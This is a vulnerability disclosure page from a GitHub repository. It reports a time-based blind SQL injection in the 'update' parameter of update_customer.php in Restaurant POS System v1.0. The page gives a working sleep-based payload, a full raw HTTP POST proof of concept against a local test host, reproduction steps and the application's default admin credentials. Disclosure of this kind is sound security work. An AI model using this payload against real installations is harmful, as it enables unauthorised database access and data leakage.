Skip to content
Permalink
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time

Vulnerability Description

Restaurant POS System v1.0 was discovered to contain a SQL injection vulnerability via the update_customer.php. It is an open source project from campcodes.com. This vulnerability can lead to database information leakage.

  1. Vulnerability Submitter: Tr0e
  2. vendors: Restaurant POS System in PHP with Source Code - CodeAstro
  3. The program is built using the xmapp/v3.3.0 and PHP/8.1.10 version;
  4. Vulnerability location: /RestaurantPOS/Restro/admin/update_customer.php

Vulnerability Verification

[+] Payload:

test'and(select*from(select+sleep(3))a/**/union/**/select+1)='

POC:

POST http://192.168.0.120:91/RestaurantPOS/Restro/admin/update_customer.php?update=dac2ad667158'and(select*from(select+sleep(3))a/**/union/**/select+1)=' HTTP/1.1
Host: 192.168.0.120:91
Content-Length: 130
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.0.120:91
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.0.120:91/RestaurantPOS/Restro/admin/update_customer.php?update=dac2ad667158
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: PHPSESSID=ldi7mdlvm8g7bnfhunuvrhp8ne
Connection: close

customer_name=Yao&customer_phoneno=13011113333&customer_email=123%40qq.com&customer_password=123456&updateCustomer=Update+Customer

How to verify

  1. Build the vulnerability environment according to the steps provided by the source code author ;
  2. log in to the "Admin Panel” through the default account and password(Email: admin@mail.com Password: codeastro.com);
  3. The vulnerability is located at the "Customers - Update" function, you should inserts Payload when you Update any customer's information,as shown in the following figure:

image image